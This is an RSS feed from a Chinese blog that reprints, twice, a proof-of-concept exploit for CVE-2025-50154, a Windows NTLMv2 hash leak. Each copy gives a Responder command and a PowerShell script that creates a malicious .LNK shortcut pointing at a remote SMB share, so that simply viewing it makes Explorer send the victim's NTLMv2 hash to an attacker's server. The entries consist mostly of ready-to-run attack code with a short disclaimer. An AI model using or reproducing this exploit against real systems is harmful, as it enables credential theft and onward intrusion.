NTLMv2 on 办公AI智能小助手 https://blog.qife122.com/tags/ntlmv2/ Recent content in NTLMv2 on 办公AI智能小助手 Hugo zh-cn qife Fri, 24 Oct 2025 22:41:05 +0800 Windows NTLMv2哈希泄露漏洞利用详解 https://blog.qife122.com/p/windows-ntlmv2%E5%93%88%E5%B8%8C%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ Fri, 24 Oct 2025 22:41:05 +0800 https://blog.qife122.com/p/windows-ntlmv2%E5%93%88%E5%B8%8C%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ <h1 id="漏洞标题microsoft-windows-10019045---ntlmv2哈希泄露">漏洞标题:Microsoft Windows 10.0.19045 - NTLMv2哈希泄露</h1> <h1 id="日期2025-08-13">日期:2025-08-13</h1> <h1 id="漏洞作者ruben-enkaoua">漏洞作者:Ruben Enkaoua</h1> <h1 id="作者链接httpsxcomrubenlabs">作者链接:https://x.com/RubenLabs, <a href="https://github.com/rubenformation">https://github.com/rubenformation</a></h1> <h1 id="原始博客httpscymulatecomblogzero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154">原始博客:https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/</h1> <h1 id="厂商主页httpsmicrosoftcom">厂商主页:https://microsoft.com</h1> <h1 id="软件链接httpswwwmicrosoftcomen-ussoftware-download">软件链接:https://www.microsoft.com/en-us/software-download</h1> <h1 id="版本2025年8月补丁星期二之前的所有版本">版本:2025年8月补丁星期二之前的所有版本</h1> <h1 id="测试环境windows-10019045">测试环境:Windows 10.0.19045</h1> <h1 id="cvecve-2025-50154">CVE:CVE-2025-50154</h1> <h1 id="此漏洞利用针对cve-2025-24054补丁绕过">此漏洞利用针对CVE-2025-24054补丁绕过</h1> <h1 id="启动responder">启动responder:</h1> <h1 id="responder--i---v">responder -I <interface> -v</h1> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="cm">&lt;# </span></span></span><span class="line"><span class="cl"><span class="cm">.</span><span class="sd">SYNOPSIS</span><span class="cm"> </span></span></span><span class="line"><span class="cl"><span class="cm"> 创建恶意LNK文件以触发SMB NTLMv2-SSP哈希泄露。 </span></span></span><span class="line"><span class="cl"><span class="cm"> 此代码仅用于教育和研究目的。 </span></span></span><span class="line"><span class="cl"><span class="cm"> 作者不对此代码的任何误用承担责任。 </span></span></span><span class="line"><span class="cl"><span class="cm">.</span><span class="sd">DESCRIPTION</span><span class="cm"> </span></span></span><span class="line"><span class="cl"><span class="cm"> 此脚本生成指向远程SMB托管二进制文件的.LNK快捷方式。 </span></span></span><span class="line"><span class="cl"><span class="cm"> 该快捷方式使用默认的Windows图标(SHELL32.dll),但仍然强制资源管理器从远程二进制文件获取PE图标,从而触发身份验证。 </span></span></span><span class="line"><span class="cl"><span class="cm">.PARAMETER path </span></span></span><span class="line"><span class="cl"><span class="cm"> LNK文件将保存的本地路径(例如:C:\Users\User\Desktop)。 </span></span></span><span class="line"><span class="cl"><span class="cm">.PARAMETER ip </span></span></span><span class="line"><span class="cl"><span class="cm"> 托管二进制文件的远程SMB服务器的IP地址或主机名。 </span></span></span><span class="line"><span class="cl"><span class="cm">.PARAMETER share </span></span></span><span class="line"><span class="cl"><span class="cm"> SMB服务器上存储二进制文件的共享文件夹。 </span></span></span><span class="line"><span class="cl"><span class="cm">.PARAMETER file </span></span></span><span class="line"><span class="cl"><span class="cm"> 二进制文件的名称(例如:payload.exe)。 </span></span></span><span class="line"><span class="cl"><span class="cm">.</span><span class="sd">EXAMPLE</span><span class="cm"> </span></span></span><span class="line"><span class="cl"><span class="cm"> .\poc.ps1 -path &#34;C:\Temp&#34; -ip &#34;192.168.1.10&#34; -share &#34;malware&#34; -file &#34;payload.exe&#34; </span></span></span><span class="line"><span class="cl"><span class="cm">#&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">param</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="nb">Parameter</span><span class="p">(</span><span class="na">Mandatory</span><span class="p">=</span><span class="vm">$true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="no">string</span><span class="p">]</span><span class="nv">$path</span><span class="p">,</span> <span class="c"># -path</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="nb">Parameter</span><span class="p">(</span><span class="na">Mandatory</span><span class="p">=</span><span class="vm">$true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="no">string</span><span class="p">]</span><span class="nv">$ip</span><span class="p">,</span> <span class="c"># -ip</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="nb">Parameter</span><span class="p">(</span><span class="na">Mandatory</span><span class="p">=</span><span class="vm">$true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="no">string</span><span class="p">]</span><span class="nv">$share</span><span class="p">,</span> <span class="c"># -share</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="nb">Parameter</span><span class="p">(</span><span class="na">Mandatory</span><span class="p">=</span><span class="vm">$true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="no">string</span><span class="p">]</span><span class="nv">$file</span> <span class="c"># -file</span> </span></span><span class="line"><span class="cl"><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c"># 构建文件路径</span> </span></span><span class="line"><span class="cl"><span class="nv">$shortcutPath</span> <span class="p">=</span> <span class="nb">Join-Path</span> <span class="nv">$path</span> <span class="s2">&#34;poc.lnk&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$targetPath</span> <span class="p">=</span> <span class="s2">&#34;\\</span><span class="nv">$ip</span><span class="s2">\</span><span class="nv">$share</span><span class="s2">\</span><span class="nv">$file</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iconLocation</span> <span class="p">=</span> <span class="s2">&#34;C:\Windows\System32\SHELL32.dll&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c"># 创建LNK文件</span> </span></span><span class="line"><span class="cl"><span class="nv">$wShell</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">-ComObject</span> <span class="n">WScript</span><span class="p">.</span><span class="py">Shell</span> </span></span><span class="line"><span class="cl"><span class="nv">$shortcut</span> <span class="p">=</span> <span class="nv">$wShell</span><span class="p">.</span><span class="py">CreateShortcut</span><span class="p">(</span><span class="nv">$shortcutPath</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$shortcut</span><span class="p">.</span><span class="py">TargetPath</span> <span class="p">=</span> <span class="nv">$targetPath</span> </span></span><span class="line"><span class="cl"><span class="nv">$shortcut</span><span class="p">.</span><span class="py">IconLocation</span> <span class="p">=</span> <span class="nv">$iconLocation</span> </span></span><span class="line"><span class="cl"><span class="nv">$shortcut</span><span class="p">.</span><span class="py">Save</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">Write-Output</span> <span class="s2">&#34;快捷方式创建于:</span><span class="nv">$shortcutPath</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">Write-Output</span> <span class="s2">&#34;目标路径:</span><span class="nv">$targetPath</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div> Windows NTLMv2哈希泄露漏洞利用详解 https://blog.qife122.com/p/windows-ntlmv2%E5%93%88%E5%B8%8C%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ Sun, 28 Sep 2025 14:08:03 +0800 https://blog.qife122.com/p/windows-ntlmv2%E5%93%88%E5%B8%8C%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ <h1 id="漏洞标题microsoft-windows-10019045---ntlmv2哈希泄露">漏洞标题:Microsoft Windows 10.0.19045 - NTLMv2哈希泄露</h1> <h1 id="日期2025-08-13">日期:2025-08-13</h1> <h1 id="漏洞作者ruben-enkaoua">漏洞作者:Ruben Enkaoua</h1> <h1 id="作者链接httpsxcomrubenlabs">作者链接:https://x.com/RubenLabs, <a href="https://github.com/rubenformation">https://github.com/rubenformation</a></h1> <h1 id="原始博客httpscymulatecomblogzero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154">原始博客:https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/</h1> <h1 id="厂商主页httpsmicrosoftcom">厂商主页:https://microsoft.com</h1> <h1 id="软件链接httpswwwmicrosoftcomen-ussoftware-download">软件链接:https://www.microsoft.com/en-us/software-download</h1> <h1 id="版本2025年8月补丁星期二之前的所有版本">版本:2025年8月补丁星期二之前的所有版本</h1> <h1 id="测试环境windows-10019045">测试环境:Windows 10.0.19045</h1> <h1 id="cvecve-2025-50154">CVE:CVE-2025-50154</h1> <h1 id="此漏洞利用针对cve-2025-24054补丁绕过">此漏洞利用针对CVE-2025-24054补丁绕过</h1> <h1 id="启动responder">启动responder:</h1> <h1 id="responder--i---v">responder -I <interface> -v</h1> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="c1">#</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">SYNOPSIS</span> </span></span><span class="line"><span class="cl"> <span class="err">创建恶意</span><span class="n">LNK文件</span><span class="err">,触发</span><span class="n">SMB</span> <span class="n">NTLMv2</span><span class="o">-</span><span class="n">SSP哈希泄露</span><span class="err">。</span> </span></span><span class="line"><span class="cl"> <span class="err">此代码仅用于教育和研究目的。</span> </span></span><span class="line"><span class="cl"> <span class="err">作者不对此代码的任何误用负责。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">DESCRIPTION</span> </span></span><span class="line"><span class="cl"> <span class="err">此脚本生成指向远程</span><span class="n">SMB托管二进制文件的</span><span class="o">.</span><span class="n">LNK快捷方式</span><span class="err">。</span> </span></span><span class="line"><span class="cl"> <span class="err">该快捷方式使用默认的</span><span class="n">Windows图标</span><span class="err">(</span><span class="n">SHELL32</span><span class="o">.</span><span class="n">dll</span><span class="err">),但仍会强制资源管理器</span> </span></span><span class="line"><span class="cl"> <span class="err">从远程二进制文件获取</span><span class="n">PE图标</span><span class="err">,从而触发身份验证。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">PARAMETER</span> <span class="n">path</span> </span></span><span class="line"><span class="cl"> <span class="err">保存</span><span class="n">LNK文件的本地路径</span><span class="err">(例如,</span><span class="n">C</span><span class="p">:</span>\<span class="n">Users</span>\<span class="n">User</span>\<span class="n">Desktop</span><span class="err">)。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">PARAMETER</span> <span class="n">ip</span> </span></span><span class="line"><span class="cl"> <span class="err">托管二进制文件的远程</span><span class="n">SMB服务器的IP地址或主机名</span><span class="err">。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">PARAMETER</span> <span class="n">share</span> </span></span><span class="line"><span class="cl"> <span class="n">SMB服务器上存储二进制文件的共享文件夹</span><span class="err">。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">PARAMETER</span> <span class="n">file</span> </span></span><span class="line"><span class="cl"> <span class="err">二进制文件的名称(例如,</span><span class="n">payload</span><span class="o">.</span><span class="n">exe</span><span class="err">)。</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">EXAMPLE</span> </span></span><span class="line"><span class="cl"> <span class="o">.</span>\<span class="n">poc</span><span class="o">.</span><span class="n">ps1</span> <span class="o">-</span><span class="n">path</span> <span class="s2">&#34;C:\Temp&#34;</span> <span class="o">-</span><span class="n">ip</span> <span class="s2">&#34;192.168.1.10&#34;</span> <span class="o">-</span><span class="n">share</span> <span class="s2">&#34;malware&#34;</span> <span class="o">-</span><span class="n">file</span> <span class="s2">&#34;payload.exe&#34;</span> </span></span><span class="line"><span class="cl"><span class="c1">#&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">param</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Mandatory</span><span class="o">=$</span><span class="bp">true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">string</span><span class="p">]</span><span class="o">$</span><span class="n">path</span><span class="p">,</span> <span class="c1"># -path</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Mandatory</span><span class="o">=$</span><span class="bp">true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">string</span><span class="p">]</span><span class="o">$</span><span class="n">ip</span><span class="p">,</span> <span class="c1"># -ip</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Mandatory</span><span class="o">=$</span><span class="bp">true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">string</span><span class="p">]</span><span class="o">$</span><span class="n">share</span><span class="p">,</span> <span class="c1"># -share</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Mandatory</span><span class="o">=$</span><span class="bp">true</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="n">string</span><span class="p">]</span><span class="o">$</span><span class="n">file</span> <span class="c1"># -file</span> </span></span><span class="line"><span class="cl"><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 构建文件路径</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shortcutPath</span> <span class="o">=</span> <span class="n">Join</span><span class="o">-</span><span class="ne">Path</span> <span class="o">$</span><span class="n">path</span> <span class="s2">&#34;poc.lnk&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">targetPath</span> <span class="o">=</span> <span class="s2">&#34;</span><span class="se">\\</span><span class="s2">$ip\$share\$file&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">iconLocation</span> <span class="o">=</span> <span class="s2">&#34;C:\Windows\System32\SHELL32.dll&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 创建LNK文件</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">wShell</span> <span class="o">=</span> <span class="n">New</span><span class="o">-</span><span class="ne">Object</span> <span class="o">-</span><span class="n">ComObject</span> <span class="n">WScript</span><span class="o">.</span><span class="n">Shell</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shortcut</span> <span class="o">=</span> <span class="o">$</span><span class="n">wShell</span><span class="o">.</span><span class="n">CreateShortcut</span><span class="p">(</span><span class="o">$</span><span class="n">shortcutPath</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shortcut</span><span class="o">.</span><span class="n">TargetPath</span> <span class="o">=</span> <span class="o">$</span><span class="n">targetPath</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shortcut</span><span class="o">.</span><span class="n">IconLocation</span> <span class="o">=</span> <span class="o">$</span><span class="n">iconLocation</span> </span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shortcut</span><span class="o">.</span><span class="n">Save</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">Write</span><span class="o">-</span><span class="n">Output</span> <span class="s2">&#34;快捷方式创建于:$shortcutPath&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">Write</span><span class="o">-</span><span class="n">Output</span> <span class="s2">&#34;目标路径:$targetPath&#34;</span> </span></span></code></pre></td></tr></table> </div> </div>